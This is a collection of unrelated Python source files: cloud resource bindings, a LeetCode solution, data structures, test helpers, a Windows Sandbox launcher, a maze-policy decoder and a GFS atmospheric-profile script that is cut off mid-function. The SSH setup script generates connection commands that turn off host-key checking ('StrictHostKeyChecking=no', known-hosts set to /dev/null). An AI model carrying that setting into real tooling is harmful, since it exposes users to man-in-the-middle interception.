        __props__["inbound_default_policy"] = inbound_default_policy
        __props__["inbound_rules"] = inbound_rules
        __props__["name"] = name
        __props__["organization_id"] = organization_id
        __props__["outbound_default_policy"] = outbound_default_policy
        __props__["outbound_rules"] = outbound_rules
        __props__["stateful"] = stateful
        __props__["zone"] = zone
        return InstanceSecurityGroup(resource_name, opts=opts, __props__=__props__)
    def translate_output_property(self, prop):
        # Map provider camelCase output names to Python snake_case.
        return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
    def translate_input_property(self, prop):
        # Map Python snake_case input names to provider camelCase.
        return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| StarcoderdataPython |
class Solution(object):
    """LeetCode 1704: determine whether the two halves of a string
    contain the same number of vowels.
    """

    # Class-level constant so count_vowel works even when called before
    # halvesAreAlike.  The original bound self.vowels lazily inside
    # halvesAreAlike, making count_vowel order-dependent (AttributeError
    # if called first).
    vowels = frozenset('aeiouAEIOU')

    def halvesAreAlike(self, s):
        """
        Return True if both halves of s hold equally many vowels.

        :type s: str
        :rtype: bool
        """
        halve = len(s) // 2
        return self.count_vowel(s[:halve]) == self.count_vowel(s[halve:])

    def count_vowel(self, s):
        """Return the number of vowel characters (either case) in s."""
        return sum(1 for c in s if c in self.vowels)
def test_halves_are_alike():
    """Spot-check halvesAreAlike on known alike / not-alike words."""
    solver = Solution()
    cases = {
        "book": True,
        "textbook": False,
        "MerryChristmas": False,
        "AbCdEfGh": True,
    }
    for word, expected in cases.items():
        assert solver.halvesAreAlike(word) == expected
| StarcoderdataPython |
from abc import ABC, abstractmethod
class EntityBase(ABC):
    """Abstract base class for displayable entities.

    Subclasses must implement ``__str__`` and ``print``.  Deriving from
    ``abc.ABC`` makes the ``@abstractmethod`` decorators actually
    enforceable: the original plain-object base silently allowed
    instantiation of incomplete subclasses.
    """

    @abstractmethod
    def __str__(self, prefix=""):
        """Return a textual representation of this entity.

        :param prefix: must be output at the start of each line of output
        :return: a string

        example::

            def __str__(self, prefix=""):
                return colored(f"MyEntity {self.id}", 'red') + \
                    f"{prefix}  attr1: {self.attr1}\n" + \
                    f"{prefix}  attr2: {self.attr2}\n"
        """

    @abstractmethod
    def print(self, prefix="", verbose=False, associated_entities_to_show=None):
        """Display a textual representation of this entity and, optionally,
        associated ones.

        :param prefix: must be output at the start of each line of output
        :param verbose: display verbose output, pass this on to other entities
        :param associated_entities_to_show: an array of strings, each of which
            is an entity name, e.g. "file", that should also be displayed
        :return: nothing
        """
197639 | <filename>ch07/list_stack.py
"""
Stack Data Type implemented using linked lists.
"""
from algs.node import Node
class Stack:
    """LIFO stack implemented on top of a singly linked list of Node objects."""

    def __init__(self):
        # Head of the linked list; None means the stack is empty.
        self.top = None

    def is_empty(self):
        """Return True when the stack holds no items."""
        return self.top is None

    def push(self, val):
        """Place *val* on top of the stack."""
        self.top = Node(val, self.top)

    def pop(self):
        """Remove and return the top item.

        Raises:
            RuntimeError: if the stack is empty.
        """
        if self.top is None:
            raise RuntimeError('Stack is empty')
        node = self.top
        self.top = node.next
        return node.value
5188441 | <reponame>zmcneilly/animated-journey
import argparse
import re
import os
import ssh_config
import paramiko
import getpass
from pathlib import Path
from ssh_config.hosts import ping
def prompt_for_input(prompt: str = "Continue? [y/n]"):
    """Prompt repeatedly until the user answers yes or no.

    Answers starting with 'y' (any case) return True, with 'n' return
    False; anything else — including an empty answer, which crashed the
    original with IndexError on ``resp[0]`` — prints "Invalid input" and
    re-prompts.  Iteration replaces the original's unbounded recursion.

    :param prompt: text shown to the user on each attempt.
    :return: True for yes, False for no.
    """
    while True:
        resp = input(prompt).lower().strip()
        if resp.startswith("y"):
            return True
        if resp.startswith("n"):
            return False
        print("Invalid input")
def parse_args(argv=None):
    """Parse the command-line arguments for the SSH setup script.

    :param argv: optional list of argument strings; defaults to
        ``sys.argv[1:]``.  The parameter is new but defaulted, so the
        original zero-argument call keeps working — it exists to make
        the parser testable.
    :return: the parsed ``argparse.Namespace``.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("--port", type=int, help="Port to connect to", default=22)
    parser.add_argument("--binary", type=str, default="/usr/bin/ssh", help="SSH binary to use")
    parser.add_argument("--key", type=str, default="", help="SSH Key to install on remote host")
    parser.add_argument("--output", help="Bash script to write to")
    parser.add_argument('connection_string', type=str, help="SSH Connection string")
    return parser.parse_args(argv)
def open_ssh_key(path: str, password: str = None) -> (paramiko.pkey.PKey, str):
    """
    Load the private key at *path*, trying each supported key type.

    :param path: path to the private key file
    :param password: optional passphrase; prompted for once if a key
        turns out to be encrypted
    :return: tuple of (loaded key, passphrase used or None)
    :raises paramiko.SSHException: if no supported key type can parse
        the file

    Fixes over the original implementation:
      * a key that loads without a passphrase is actually returned — the
        original parsed it, discarded the result, and fell through to
        return None implicitly;
      * the file is rewound (seek(0)) before every parse attempt — the
        original left the file pointer at EOF after the first failed
        attempt, so later key types always saw an empty stream;
      * exhausting all key types raises a clear SSHException instead of
        silently returning None (which crashed the caller's unpacking).
    """
    with open(path, "r") as __f:
        for key_type in [paramiko.DSSKey, paramiko.RSAKey, paramiko.ECDSAKey]:
            __f.seek(0)
            try:
                # Unencrypted key: return it together with the (unused) password.
                return key_type.from_private_key(__f), password
            except paramiko.PasswordRequiredException:
                if password is None:
                    password = getpass.getpass("SSH Key password: ")
                __f.seek(0)
                try:
                    return key_type.from_private_key(__f, password), password
                except paramiko.SSHException:
                    # Wrong key type (or bad passphrase); try the next type.
                    pass
            except paramiko.SSHException:
                # File is not a key of this type; try the next one.
                pass
    raise paramiko.SSHException("Unable to load private key: {}".format(path))
def main():
    """Interactively set up SSH access to a host and emit a connect script.

    Workflow: parse the ``user@host`` target, ping it, load or create the
    stored host configuration, verify the host key and the login,
    optionally prepare an SSH key, write a small bash wrapper script to
    ``--output``, then persist the (possibly updated) configuration.
    """
    # Handle arguments
    args = parse_args()
    # Split "user@host" (the user part is optional).
    match = re.search(r'^(?:([^@]+)@)?(.*)$', args.connection_string)
    hostname = match.group(2)
    username = match.group(1)
    ssh_args = "-o GlobalKnownHostsFile=/dev/null -o StrictHostKeyChecking=no"
    # Do inital setup of host and user; default to the current login name.
    if username is None or username == "":
        username = os.environ["USER"]
    if not ping(hostname):
        if not prompt_for_input("{} not responding; continue? [y/n]".format(hostname)):
            raise ConnectionError("Cannot reach {}".format(hostname))
    host_config = ssh_config.load_host_configuration_file(hostname)
    user_config = ssh_config.SshUser(username)
    if host_config is None:
        # First contact with this host: record its current public key.
        pub_key = ssh_config.get_host_key(hostname, args.port)
        host_config = ssh_config.SshConfig(hostname, args.port, public_host_key=pub_key, users={user_config})
    # Reuse the stored user entry if one matches the requested username.
    for user in host_config.users:
        if user.name == username:
            user_config = user
    # Validate the SSH host key against the stored record.
    if not host_config.validate_public_host_key():
        if prompt_for_input("Public key doesn't match records; continue? [y/n]"):
            host_config.public_host_key = ssh_config.get_host_key(host_config.working_alias, host_config.port)
        else:
            raise ConnectionError("Public host key is wrong! Aborting")
    # Check if key was specified at the command line
    if args.key != "":
        user_config.key_location = str(Path(args.key).resolve())
        user_config.desire_key = True
    # Re-prompt for the password until a login succeeds.
    while not host_config.validate_login(user_config):
        user_config.passwd = getpass.getpass("Can't authenticate. {con_str}'s password: ".format(con_str=args.connection_string))
    host_config.users.update({user_config})
    # Paramiko, at least, has access.
    # Handle key installation
    if user_config.desire_key and Path(user_config.key_location).exists():
        priv_key, priv_key_password = open_ssh_key(user_config.key_location, user_config.key_password)
        pub_key = priv_key.get_base64()
        if priv_key_password is not None:
            user_config.key_password = priv_key_password
        ssh = host_config.get_ssh_connection(user_config)
        sftp = ssh.open_sftp()
        # NOTE(review): pub_key and sftp are computed here but never used —
        # the actual key installation step appears to be unfinished; confirm.
    # Create bash script
    with open(str(Path(args.output).resolve()), "w") as __f:
        connection = "{ssh} {arguments} {user}@{host}\n\n".format(ssh=args.binary,
                                                                  arguments=ssh_args,
                                                                  user=user_config.name,
                                                                  host=host_config.working_alias)
        __f.write("#!/bin/bash\n\n")
        __f.write(connection)
    # Save any changes
    host_config.users.update({user_config})
    ssh_config.add_to_configuration(host_config)
if __name__ == "__main__":
main() | StarcoderdataPython |
4811560 | from __future__ import annotations
from ._version import version as __version__
__all__ = ["__version__"]
| StarcoderdataPython |
3369495 | from requests.exceptions import HTTPError
from unittest.mock import Mock
requests = Mock()


def get_users():
    """Fetch the user list; return the parsed JSON body on HTTP 200, else None."""
    response = requests.get('http://demo/api/users')
    return response.json() if response.status_code == 200 else None
if __name__ == '__main__':
    # Demonstration: make every requests.get raise, call get_users once,
    # then verify the mock recorded exactly one call.
    requests.get.side_effect = HTTPError
    try:
        get_users()
    except HTTPError:
        print('HTTPError')
    # Assert that the mock was called exactly once.
    requests.get.assert_called_once()
    # Calling get_users() a second time would make the assertion fail:
    # try:
    #     get_users()
    # except HTTPError:
    #     print('HTTPError')
    # # AssertionError: Expected 'get' to have been called once. Called 2 times
# requests.get.assert_called_once() | StarcoderdataPython |
3447477 | import os
import shutil
import sys
import pytest
import torch
from torch.utils.data.dataloader import DataLoader
from torchvision import models, transforms
# Make the repository root importable so the torchfuel package resolves
# when this test file is executed directly from the source tree.
torchfuel_path = os.path.dirname(
    os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
)
sys.path.append(torchfuel_path)
from torchfuel.data_loaders.image import ImageDataLoader, ImageToImageDataLoader
from torchfuel.models.visible_resnet import VisibleResnet
from torchfuel.visualisation.grad_cam import GradCAM
# Fixed seed so the data-augmentation / model behaviour is reproducible.
torch.manual_seed(1)


def test():
    """End-to-end smoke test: load image data, run a VisibleResnet forward
    pass, generate Grad-CAM visualisations, and check one CAM image is
    produced per input image.

    Requires the test image folders on disk and downloads pretrained
    ResNet-50 weights; cleans up the generated CAM folder afterwards.
    """
    dl = ImageDataLoader(
        train_data_folder="test/imgs/train",
        eval_data_folder="test/imgs/eval",
        pil_transformations=[
            transforms.RandomHorizontalFlip(),
            transforms.RandomVerticalFlip(),
        ],
        batch_size=16,
        imagenet_format=True,
    )
    train_dataloader = dl.train_dl
    n_classes = dl.n_classes
    device = torch.device("cpu")
    # Pull one batch to exercise the loader and feed the model.
    it = iter(train_dataloader)
    X, y = next(it)
    resnet = models.resnet50(pretrained=True)
    model = VisibleResnet(resnet, n_classes).to(device)
    assert isinstance(model(X), torch.Tensor)
    img_folder = "test/imgs/train"
    cam_folder = "test/cams"
    # Start from a clean output directory.
    shutil.rmtree(cam_folder, ignore_errors=True)
    visualiser = GradCAM(model, resolution=14)
    visualiser.gen_visualisation_for_multiple_images(
        device, img_folder, cam_folder, imagenet=True
    )
    cams = os.listdir(cam_folder)
    imgs = []
    for subfolder in os.listdir(img_folder):
        imgs.extend(os.listdir(os.path.join(img_folder, subfolder)))
    # One CAM file must have been produced for every input image.
    assert cams
    assert len(cams) == len(imgs)
    shutil.rmtree(cam_folder, ignore_errors=True)
if __name__ == "__main__":
    # Allow running this test directly, outside of a test runner.
    test()
| StarcoderdataPython |
365483 | """
This script is part of a Windows Shell Extension that allows you to run executable files
in a sandboxed environment using the right click menu.
Note that the script maps the entire parent directory of the executable,
this is done in order to preserve potential local dependencies.
"""
import sys
import argparse
import pathlib
import winsandbox
def read_args(argv=None):
    """Parse the command-line arguments for the sandbox launcher.

    :param argv: optional list of argument strings; defaults to
        ``sys.argv[1:]``.  New but defaulted parameter — the original
        zero-argument call still works; it exists for testability.
    :return: the parsed ``argparse.Namespace``.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("executable", help="The executable path to run sandboxed")
    parser.add_argument("--network", default=False, action="store_true", help="Enable networking in the sandbox")
    parser.add_argument("--run", default=False, action="store_true", help="Run the executable inside the sandbox")
    return parser.parse_args(argv)
def main():
    """Map the executable's parent directory into a new Windows Sandbox.

    The whole parent directory is mapped read-only so local dependencies
    sitting next to the executable remain available inside the sandbox;
    with ``--run`` the executable is launched via the sandbox logon
    script, otherwise the mapped folder is opened in Explorer.
    """
    args = read_args()
    executable = pathlib.PurePath(args.executable)
    # Map executable folder to sandbox (read-only).
    mapper = winsandbox.FolderMapper(folder_path=executable.parent, read_only=True)
    # Windows Sandbox surfaces mapped folders on WDAGUtilityAccount's desktop.
    sandbox_mapped_dir = pathlib.PurePath(r'C:\Users\WDAGUtilityAccount\Desktop') / executable.parent.name
    if args.run:
        # Run the executable
        command = 'cmd /c "{}"'.format(sandbox_mapped_dir / executable.name)
    else:
        # Only open mapped folder
        command = 'explorer "{}"'.format(sandbox_mapped_dir)
    # Launch the sandbox
    winsandbox.new_sandbox(networking=args.network, logon_script=command, folder_mappers=[mapper])
if __name__ == '__main__':
    # Script entry point.
    main()
| StarcoderdataPython |
229718 | <filename>maze-solver/decoder.py
#! /usr/bin/python
import argparse
import numpy as np
# Module-level parser; its arguments are attached in the __main__ block
# at the bottom of the file.
parser = argparse.ArgumentParser()
class MazeMDPSolver:
    """Decode an optimal MDP policy back into maze moves (N/S/E/W).

    Cell values in the grid file: 0 = free cell, 2 = start, 3 = goal;
    any other value (presumably walls) is given no MDP state.  Free,
    start and goal cells are numbered row-major over the grid interior.
    Construction immediately decodes and prints the move sequence.
    """
    def __init__(self, grid, value_policy):
        # numActions is fixed at 4 (N, S, E, W); numStates is filled in
        # by process_grid.
        self.numStates = 0
        self.numActions = 4
        self.start = 0
        self.end = 0
        maze, coordinate_to_state_mapping = self.process_grid(grid)
        optimal_action = self.process_value_policy(value_policy)
        self.simulate_optimal_policy(maze, coordinate_to_state_mapping,
                                     optimal_action)
    def process_grid(self, grid):
        """Read the maze file.

        :param grid: path to a whitespace-separated grid of cell values.
        :return: (maze matrix, numStates x 2 array mapping state -> (x, y)).
        """
        data = open(grid, 'r').read()
        # Row count from newlines; column count from total token count.
        rows = len(data.split('\n')) - 1
        cols = len(data.split()) // rows
        maze = np.zeros((rows, cols))
        for i in range(len(data.split())):
            maze[i // cols][i % cols] = data.split()[i]
        # One state per '0' cell plus two more for the start (2) and goal (3).
        self.numStates = data.count('0') + 2
        coordinate_to_state_mapping = np.zeros((self.numStates, 2))
        currentState = 0
        # Only interior cells are scanned; the border ring is never mapped.
        for x in range(1, rows - 1):
            for y in range(1, cols - 1):
                value = maze[x][y]
                if value == 0:
                    coordinate_to_state_mapping[currentState][0] = x
                    coordinate_to_state_mapping[currentState][1] = y
                    currentState += 1
                elif value == 2:
                    coordinate_to_state_mapping[currentState][0] = x
                    coordinate_to_state_mapping[currentState][1] = y
                    self.start = currentState
                    currentState += 1
                elif value == 3:
                    coordinate_to_state_mapping[currentState][0] = x
                    coordinate_to_state_mapping[currentState][1] = y
                    self.end = currentState
                    currentState += 1
        return maze, coordinate_to_state_mapping
    def process_value_policy(self, value_policy):
        """Parse the per-state policy file ("<value> <action>" per line).

        :return: numStates x 1 array of optimal action indices.
        """
        data = open(value_policy, 'r')
        optimal_action = np.zeros((self.numStates, 1))
        currentState = 0
        for line in data:
            elements = line.split(' ')
            # Second column is the action index for this state.
            optimal_action[currentState, 0] = int(elements[1])
            currentState += 1
        return optimal_action
    def simulate_optimal_policy(self, maze, coordinate_to_state_mapping,
                                optimal_action):
        """Walk from start to goal printing one move letter per step.

        Action encoding: 0 = N (x-1), 1 = S (x+1), 2 = E (y+1),
        anything else = W (y-1).  The successor state is found by linear
        search over the coordinate table.
        """
        currentState = self.start
        while currentState != self.end:
            x = coordinate_to_state_mapping[currentState][0]
            y = coordinate_to_state_mapping[currentState][1]
            if optimal_action[currentState][0] == 0:
                print('N', end=" ")
                for i in range(self.numStates):
                    if coordinate_to_state_mapping[i][
                            0] == x - 1 and coordinate_to_state_mapping[i][
                                1] == y:
                        currentState = i
            elif optimal_action[currentState][0] == 1:
                print('S', end=" ")
                for i in range(self.numStates):
                    if coordinate_to_state_mapping[i][
                            0] == x + 1 and coordinate_to_state_mapping[i][
                                1] == y:
                        currentState = i
            elif optimal_action[currentState][0] == 2:
                print('E', end=" ")
                for i in range(self.numStates):
                    if coordinate_to_state_mapping[i][
                            0] == x and coordinate_to_state_mapping[i][
                                1] == y + 1:
                        currentState = i
            else:
                print('W', end=" ")
                for i in range(self.numStates):
                    if coordinate_to_state_mapping[i][
                            0] == x and coordinate_to_state_mapping[i][
                                1] == y - 1:
                        currentState = i
        print("")
if __name__ == "__main__":
    # CLI: --grid <maze file> --value_policy <policy file>; constructing
    # the solver immediately decodes and prints the move sequence.
    parser.add_argument("--grid", type=str)
    parser.add_argument("--value_policy", type=str)
    args = parser.parse_args()
    solver = MazeMDPSolver(args.grid, args.value_policy)
| StarcoderdataPython |
6421840 | import tkinter as tk
import tkinter.ttk as ttk
from tkinter.messagebox import showerror
import subprocess
from src.ui.text_area_modal import TextAreaModal
class DiffViewDialog(TextAreaModal):
    """Modal text dialog for viewing a diff, with a button that opens the
    two files in WinMerge instead.
    """
    def __init__(self, diff_left_path, diff_right_path, *args, **kwargs):
        """
        :param diff_left_path: path of the left-hand file (backslashes are
            normalised to forward slashes before storing)
        :param diff_right_path: path of the right-hand file, same treatment
        """
        super().__init__(*args, **kwargs)
        self.diff_left_path = diff_left_path.replace("\\", "/")
        self.diff_right_path = diff_right_path.replace("\\", "/")
        # Extra button in the base class's button row.
        ttk.Button(self.buttons_frame, text="View with WinMerge", command=self.open_with_winmerge).grid(row=0, column=0, sticky=tk.SE, pady=10, padx=110)
        self.raise_to_top()
    def open_with_winmerge(self):
        """Launch WinMerge on the two paths; show an error dialog on failure."""
        try:
            # Relies on 'winmergeu' being resolvable via PATH.
            subprocess.Popen(["winmergeu", self.diff_left_path, self.diff_right_path])
        except Exception as e:
            msg = f"Please make sure WinMerge is in your PATH, and that the backup XML and updated XML are still available.\n\n" + str(e)
            showerror("Unable to open WinMerge", msg)
| StarcoderdataPython |
3249382 | from numlab.lang.type import Instance, Type
# The numlab 'function' type object; the decorated functions below are
# registered as its dunder methods.
nl_function = Type.get("function")


@nl_function.method('__new__')
def nl__new__(func):
    """Create a numlab function instance wrapping the Python callable *func*."""
    _inst = Instance(nl_function)
    _inst.set('func', func)
    return _inst
@nl_function.method('__call__')
def nl__call__(self, *args, **kwargs):
    """Invoke the wrapped Python callable with the given arguments."""
    return self.get("func")(*args, **kwargs)
| StarcoderdataPython |
3569170 | #!/usr/bin/env python3
import ipdb
#ipdb.set_trace()
import configparser
import os, sys
from matplotlib import pyplot as plt
import xarray as xr
thisDir = os.path.dirname(os.path.abspath(__file__))
parentDir = os.path.dirname(thisDir)
sys.path.insert(0,parentDir)
from metpy.calc import *
from metpy.units import units
import metpy
from skyfield import api
from skyfield.api import EarthSatellite, Topos, load
import numpy as np
from datetime import datetime, timedelta
# Target-grid file (consumed by create_profile2d's fobs parameter).
fobs="obs_grid.nc"
# Input GRiB2 path candidates; only the LAST assignment to f1 takes effect.
f1="tar/gfs.t18z.pgrb2.0p25.f003"
f1="tar/gfs.t12z.pgrb2.0p25.f006"
f1="/work/noaa/dtc-hwrf/sbao/EMC_post/DOMAINPATH/postprd/GFSPRS.006.iveg2.grb2"
# NOTE(review): n_clouds / n_aerosol are defined but not referenced
# anywhere in this file.
n_clouds=5
n_aerosol=1
def find_var(f, string):
    """Return the LAST name in *f* that contains *string* and starts with
    its first three characters (f is typically an xarray Dataset, whose
    iteration yields variable names).

    The last-match semantics of the original loop are preserved.

    :raises KeyError: when nothing matches.  The original left ``found``
        unbound in that case and crashed with an unhelpful NameError.
    """
    found = None
    for name in f:
        if string in name and name.startswith(string[0:3]):
            found = name
    if found is None:
        raise KeyError("no variable matching {!r}".format(string))
    return found
def effr_cld(cld):
    """Effective size (um) for cloud water following the GFDL scheme
    (spherical drops at a fixed CCN concentration); returns the clamped
    radius doubled, zeroed where the mixing ratio is at/below threshold.
    """
    min_qc = 1.e-7
    gfdl_rhor = 1000.
    gfdl_ccn = 1.0e8
    gfdl_rewmin = 5.0
    gfdl_rewmax = 10.0
    # Keep the argument of the logarithm strictly positive.
    qc = xr.where(cld > min_qc, cld, min_qc)
    radius = np.exp(1.0 / 3.0 * np.log((3. * qc) / (4. * np.pi * gfdl_rhor * gfdl_ccn))) * 1.0e6
    radius = xr.where(radius < gfdl_rewmin, gfdl_rewmin, radius)
    radius = xr.where(radius > gfdl_rewmax, gfdl_rewmax, radius)
    # Zero out cells that never exceeded the mixing-ratio threshold.
    radius = xr.where(cld > min_qc, radius, 0)
    return radius * 2
def effr_ice(ice, temp):
    """Effective size (um) for cloud ice, GFDL temperature-dependent fit.

    NOTE(review): temp[1:] drops the first level — presumably aligning
    level temperatures with layer quantities; confirm against the caller.
    """
    min_qi = 1.e-8
    gfdl_tice = 273.16
    gfdl_beta = 1.22
    gfdl_reimin = 10.0
    gfdl_reimax = 150.0
    qi = xr.where(ice > min_qi, ice, min_qi)
    dt = temp[1:] - gfdl_tice
    # Piecewise fit: warm band first, then progressively colder bands
    # overwrite it (order matters).
    diam = xr.full_like(ice, 0.0)
    diam = xr.where(dt >= -30.0, gfdl_beta / 9.387 * np.exp((1 - 0.969) * np.log(1.0e3 * qi)) * 1.0e3, diam)
    diam = xr.where(dt < -30.0, gfdl_beta / 9.208 * np.exp((1 - 0.945) * np.log(1.0e3 * qi)) * 1.0e3, diam)
    diam = xr.where(dt < -40.0, gfdl_beta / 9.337 * np.exp((1 - 0.920) * np.log(1.0e3 * qi)) * 1.0e3, diam)
    diam = xr.where(dt < -50.0, gfdl_beta / 9.917 * np.exp((1 - 0.891) * np.log(1.0e3 * qi)) * 1.0e3, diam)
    diam = xr.where(diam < gfdl_reimin, gfdl_reimin, diam)
    diam = xr.where(diam > gfdl_reimax, gfdl_reimax, diam)
    diam = xr.where(ice > min_qi, diam, 0)
    return diam * 2
def effr_rain(rain):
    """Effective radius (um) for rain, GFDL inverse-exponential size
    distribution; zero where the mixing ratio is at/below threshold.
    """
    gfdl_rhor = 1000.
    gfdl_n0r = 8.e6
    min_qr = 1.e-7
    gfdl_gammar = 17.837789
    gfdl_alphar = 0.8
    gfdl_rermin = 0.0
    gfdl_rermax = 10000.0
    # Keep the slope parameter finite for vanishing mixing ratios.
    qr = xr.where(rain > min_qr, rain, min_qr)
    slope = np.exp(0.25 * np.log(np.pi * gfdl_rhor * gfdl_n0r / qr))
    radius = 0.5 * np.exp(np.log(gfdl_gammar / 6.0) / gfdl_alphar) / slope * 1.0e6
    radius = xr.where(radius < gfdl_rermin, gfdl_rermin, radius)
    radius = xr.where(radius > gfdl_rermax, gfdl_rermax, radius)
    return xr.where(rain > min_qr, radius, 0)
def effr_snow(snow):
    """Effective radius (um) for snow, GFDL inverse-exponential size
    distribution; zero where the mixing ratio is at/below threshold.
    """
    gfdl_rhos = 100.
    gfdl_n0s = 3.e6
    min_qs = 1.e-8
    gfdl_gammas = 8.2850630
    gfdl_alphas = 0.25
    gfdl_resmin = 0.0
    gfdl_resmax = 10000.0
    # Keep the slope parameter finite for vanishing mixing ratios.
    qs = xr.where(snow > min_qs, snow, min_qs)
    slope = np.exp(0.25 * np.log(np.pi * gfdl_rhos * gfdl_n0s / qs))
    radius = 0.5 * np.exp(np.log(gfdl_gammas / 6.0) / gfdl_alphas) / slope * 1.0e6
    radius = xr.where(radius < gfdl_resmin, gfdl_resmin, radius)
    radius = xr.where(radius > gfdl_resmax, gfdl_resmax, radius)
    return xr.where(snow > min_qs, radius, 0)
def effr_grp(grp):
    """Effective radius (um) for graupel, GFDL inverse-exponential size
    distribution; zero where the mixing ratio is at/below threshold.

    Bug fix: the final masking step previously tested the unrelated name
    ``snow`` instead of the ``grp`` argument (a NameError when called in
    isolation, or a silently wrong mask when a global ``snow`` happens to
    exist); it now masks on ``grp`` like the other hydrometeor helpers.
    """
    gfdl_rhog = 400.
    gfdl_n0g = 4.e6
    min_qg = 1.e-7
    gfdl_gammag = 11.631769
    gfdl_alphag = 0.5
    gfdl_regmin = 0.0
    gfdl_regmax = 10000.0
    # Keep the slope parameter finite for vanishing mixing ratios.
    grp_positive = xr.where(grp > min_qg, grp, min_qg)
    lambdag = np.exp(0.25 * np.log(np.pi * gfdl_rhog * gfdl_n0g / grp_positive))
    result = 0.5 * np.exp(np.log(gfdl_gammag / 6.0) / gfdl_alphag) / lambdag * 1.0e6
    result = xr.where(result < gfdl_regmin, gfdl_regmin, result)
    result = xr.where(result > gfdl_regmax, gfdl_regmax, result)
    result = xr.where(grp > min_qg, result, 0)
    return result
def angle_2d(lat,lon,y,m,d,h):
    """For every (lat, lon) grid point at time y-m-d h:00 TT, compute the
    satellite and solar viewing geometry relative to GOES-16.

    :return: array of shape (len(lat), len(lon), 5) holding per point:
        [0] satellite zenith, [1] satellite azimuth, [2] scan angle,
        [3] solar zenith, [4] solar azimuth (degrees).

    NOTE(review): downloads GOES TLEs from celestrak.com and loads the
    de421.bsp ephemeris at call time (network/disk access), and rebuilds
    the timescale inside the double loop — confirm this is acceptable.
    """
    # information about satellites (chose GOES 16)
    sats = api.load.tle('https://celestrak.com/NORAD/elements/goes.txt')
    satellite = sats['GOES 16 [+]']
    # planets
    planets = load('de421.bsp')
    sun = planets['sun']
    earth= planets['earth']
    # create array to hold angles
    angles=np.zeros((len(lat),len(lon),5))
    for i in range(len(lat)):
        for j in range(len(lon)):
            #time
            ts = api.load.timescale()
            tm = ts.tt(y,m,d,h,0,0)
            # call the surface station "boston"
            boston=Topos(str(lat[i])+' N', str(lon[j])+' E',elevation_m=0.0)
            # the angle between the two vectors: earth center to satellite and earth center to observer
            theta = satellite.at(tm).separation_from(boston.at(tm))
            # geometry
            difference = satellite - boston
            geometry = difference.at(tm).altaz()
            # angles involving satellite
            scan = np.round(180 - (90 + geometry[0].degrees + theta.degrees), 2)
            zenith = 90-np.round(geometry[0].degrees, 2)
            azimuth = np.round(geometry[1].degrees, 2)
            angles[i,j,0]=zenith
            angles[i,j,1]=azimuth
            angles[i,j,2]=scan
            # angles involving the Sun
            observer = earth + boston
            geo2 = observer.at(tm).observe(sun).apparent().altaz()
            zenithsun = np.round(geo2[0].degrees, 2)
            azimuthsun = np.round(geo2[1].degrees, 2)
            angles[i,j,3]=zenithsun
            angles[i,j,4]=azimuthsun
    return angles
def create_profile2d(f,fobs):
    """Build a 2-D atmospheric-profile dataset from a GFS GRiB2 file and
    write it to ``profile2d4_2021_gfs_EMCUPP_qv1000.nc``.

    :param f: path of the GRiB2 file.
        NOTE(review): the body opens the module-level ``f1`` instead of
        this parameter, and later rebinds ``f`` to the MODIS land-cover
        dataset — confirm whether the parameter should be used.
    :param fobs: file with the target grid (currently unused here).
    """
    # constants
    Rd = 287.0
    Rv = 461.0
    fv = Rv / Rd - 1
    # open GRiB2 file
    gfs = xr.open_dataset(f1, engine='pynio')
    # Target subdomain: 20-45N, 255-290E at 0.25-degree spacing.
    y0=np.arange(20.0,45.0,0.25)
    x0=np.arange(255,290,0.25)
    n=len(y0)*len(x0)
    # p levels
    pint=gfs.lv_ISBL0
    # heights
    hgt=gfs[find_var(gfs,"HGT_P0_L100_")].sel(lat_0=y0, lon_0=x0,method='nearest')
    # Parse initial time ("MM/DD/YYYY (HH:..)") and the forecast lead,
    # then derive the valid time.
    init_time = hgt.initial_time
    month=int(init_time.split('/')[0])
    day = int(init_time.split('/')[1])
    year =int(init_time.split('/')[2].split(" ")[0])
    hour =int(init_time.split('/')[2].split(" ")[1][1:3])
    fcst_time = hgt.forecast_time[0]
    valid_time = datetime(year,month,day,hour)+timedelta(hours=int(fcst_time))
    # water vapor levels
    # qp=gfs.lv_ISBL5
    # relative humidity
    qq=gfs[find_var(gfs,"RH_P0_L100_")].sel(lat_0=y0, lon_0=x0,method='nearest')
    # interploate q to all levels (upper levels has no moisture)
    # qpint=qq.interp(lv_ISBL5=pint,kwargs={"fill_value": 0.0})
    qpint=qq # in new input file qq are on all p levels
    # temp
    t = gfs[find_var(gfs,"TMP_P0_L100_")].sel(lat_0=y0, lon_0=x0,method='nearest')
    # mixing ratio from specific humidity, in g/kg
    sphd=gfs[find_var(gfs,"SPFH_P0_L100_")].sel(lat_0=y0,lon_0=x0,method='nearest')
    mix=sphd/(1-sphd)*1000
    # the mixing ration from RH is saved here but not used.
    mix_metpy = mixing_ratio_from_relative_humidity(pint.broadcast_like(t),t,qpint)
    mix=xr.DataArray(mix,coords=t.coords,dims=t.dims)
    mix.attrs['units']='kg/kg'
    # test another way to average mix
    mixavg=mix.rolling(lv_ISBL0=2,center=True).mean()[1:]
    # get the t and p for the layers (instead of levels)
    tavg=t.rolling(lv_ISBL0=2,center=True).mean()[1:]
    dp=xr.DataArray(np.diff(pint),dims=pint.dims).broadcast_like(tavg)
    dz=xr.DataArray(np.diff(hgt,axis=0),dims=hgt.dims).broadcast_like(tavg)
    R=287.05
    g=9.8
    # Layer pressure and density via the hydrostatic relation (dp/dz).
    pavg=-R*tavg*(1+mixavg*fv)*dp/dz/g
    rho=-(1+mixavg*fv)*dp/dz/g
    mixavg=mixavg #2000.0 #rho*-dz
    print(mixavg.max())
    # ozone and the five types of "clouds"; each is converted to a
    # per-layer column amount by multiplying with rho * layer thickness.
    o3=gfs[find_var(gfs,"O3MR_P0_L100_")].sel(lat_0=y0, lon_0=x0,method='nearest')
    #o3_pavg=o3.interp(lv_ISBL12=pavg.coords['lv_ISBL0'],kwargs={"fill_value": 0.0})
    o3_pavg=o3*rho*-dz
    # cld=gfs.CLWMR_P0_L100_GLL0.sel(lat_0=y0, lon_0=x0,method='nearest')
    cld=gfs[find_var(gfs,"CLWMR_P0_L100_")].sel(lat_0=y0, lon_0=x0,method='nearest')
    cld=cld.rename({cld.dims[0]: 'lv_ISBL_HYD'})
    cld_pavg=cld.interp(lv_ISBL_HYD=pavg.coords['lv_ISBL0'],kwargs={"fill_value": 0.0})
    cld_effr=effr_cld(cld_pavg)
